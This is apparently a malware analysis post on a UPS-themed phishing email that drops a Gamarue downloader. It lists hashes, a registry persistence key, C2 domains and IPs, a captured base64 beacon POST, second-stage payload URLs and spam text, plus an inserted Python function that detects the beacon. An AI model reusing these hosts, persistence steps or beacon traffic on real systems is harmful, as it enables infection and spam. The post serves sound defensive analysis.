UPS notify!

Subject: UPS notify
Attachment: parcel information.zip
From: PameliaBaffuto@ups.com

UPS notify
The email contained an attachment, parcel information.zip. Within this zip file was an executable with the following properties:

Name: Parcel information.exe
MD5: 0eadfb37c6664ae671d50787bc6b9e28
Size: 47,616 bytes

This payload is identified as a Gamarue downloader, a bot-controlled worm. It injects itself into a new svchost.exe process. It then makes a self-copy at:
C:\WINDOWS\system32\wuauclt.exe

It adds a registry entry to ensure that the executable runs with each system restart:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
61309 – “C:\WINDOWS\system32\wuauclt.exe”

It then queries A records from Google’s public DNS (at IP address 8.8.4.4) for the domain napasaran[.]ru. This domain is hosted at IP addresses 89.73.38.241, 122.226.120.75, and 46.4.245.38.

The following network traffic is then observed:

POST /and/image.php HTTP/1.1
Host: napasaran.ru
User-Agent: Mozilla/4.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 92
Connection: close

7fZcUO9fCz1CU4gLIDPydspxXvW8fwi9fj19n/y4Ejx0etSTslkiXgbBYnPNFDZjW/a3dF2ZHHYV88BiixGbWA==
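As an added example (not from the original post), a small Python triage function that scores a captured HTTP request against the traits of the beacon shown above: a bare "Mozilla/4.0" User-Agent, no Accept header, a form-urlencoded POST whose body is one opaque base64 token instead of key=value pairs, and the C2 host named in the write-up. The sample request is constructed from the capture; its two trailing "=" characters are assumed to have been sent as %3D, which is what makes the stated Content-Length of 92 match the 88-character base64 string.

```python
import base64
import re
from urllib.parse import unquote

# Constructed sample: the POST from the write-up re-typed as a raw request.
# Assumption: the trailing "==" travelled URL-encoded as %3D%3D (88 + 4 = 92 bytes).
SAMPLE_REQUEST = (
    "POST /and/image.php HTTP/1.1\r\nHost: napasaran.ru\r\n"
    "User-Agent: Mozilla/4.0\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 92\r\nConnection: close\r\n\r\n"
    "7fZcUO9fCz1CU4gLIDPydspxXvW8fwi9fj19n/y4Ejx0etSTslkiXgbBYnPNFDZjW/a3dF2ZHHYV88BiixGbWA%3D%3D"
)
# Constructed benign login post for comparison.
BENIGN_REQUEST = (
    "POST /login HTTP/1.1\r\nHost: example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1)\r\nAccept: text/html\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 27\r\n\r\n"
    "user=alice&password=secret1"
)
BEACON_HOSTS = {"napasaran.ru"}  # C2 host from the write-up

def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body

def is_opaque_base64(body, min_len=32):
    """True if the form body is a single base64 blob rather than key=value pairs."""
    decoded = unquote(body)
    if "&" in decoded or "=" in decoded.rstrip("="):  # real form data has separators
        return False
    if len(decoded) < min_len or len(decoded) % 4:
        return False
    if not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", decoded):
        return False
    try:
        base64.b64decode(decoded, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    return True

def score_beacon(raw):
    """Return the indicator names matched; three or more is a strong hit."""
    method, path, headers, body = parse_request(raw)
    hits = []
    if headers.get("host", "").lower() in BEACON_HOSTS:
        hits.append("known-c2-host")
    if method == "POST" and headers.get("user-agent") == "Mozilla/4.0":
        hits.append("bare-mozilla4-ua")
    if "accept" not in headers:
        hits.append("no-accept-header")
    if (headers.get("content-type", "").startswith("application/x-www-form-urlencoded")
            and is_opaque_base64(body)):
        hits.append("opaque-base64-form-body")
    return hits
```

Because the body check decodes percent-encoding first, the function flags the beacon whether the padding was sent raw or as %3D.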

The infected computer then downloads and installs the file napasaran[.]ru/test.exe. This is the Security Shield rogue AV, with the following properties:

MD5: 6ebb20543e371d72e807a62c897685d5
Size: 349,696 bytes
Timestamp: 2011:10:25 21:34:24+02:00

Security Shield AV

Next, it downloads apartmentsincorfu[.]gr/888.exe. This domain is hosted at 62.1.213.166.
This is a Wibimo spambot with the following properties:

MD5: 4162b8bceb3f4ceb97519f92e54c7f4c
Size: 27,136 bytes
Timestamp: 2011:11:21 11:45:32+01:00

It is installed as:

C:\WINDOWS\system32\ItpurnIfsoyy.dll
MD5: 03142b3993c6f8c530eb2a943173a20b
Size: 13,824 bytes

It connects to a C&C at grabsfakus[.]com:1001. This domain is hosted at three IP addresses: 78.159.111.122, 188.72.250.60 and 46.165.199.197. The domain was registered by andpushon@hotmail.com. Other domains registered with the same email address:

– hydroliets.com
– lassogol.com
– aldrorist.com
– vizits-track.com

The spambot immediately began its spam campaign of “Best quality drugs” as shown below:

Subject: BUY NOW VIAGRA CIALIS !!!

USPS – Fast Delivery Shipping 1-4 day USA
Best quality drugs
Fast Shipping USA
Professional packaging
100% guarantee on delivery
Best prices in the market
Discounts for returning customers
FDA approved productas
35000+ satisfied customers

http://fauh.doctorpou.ru
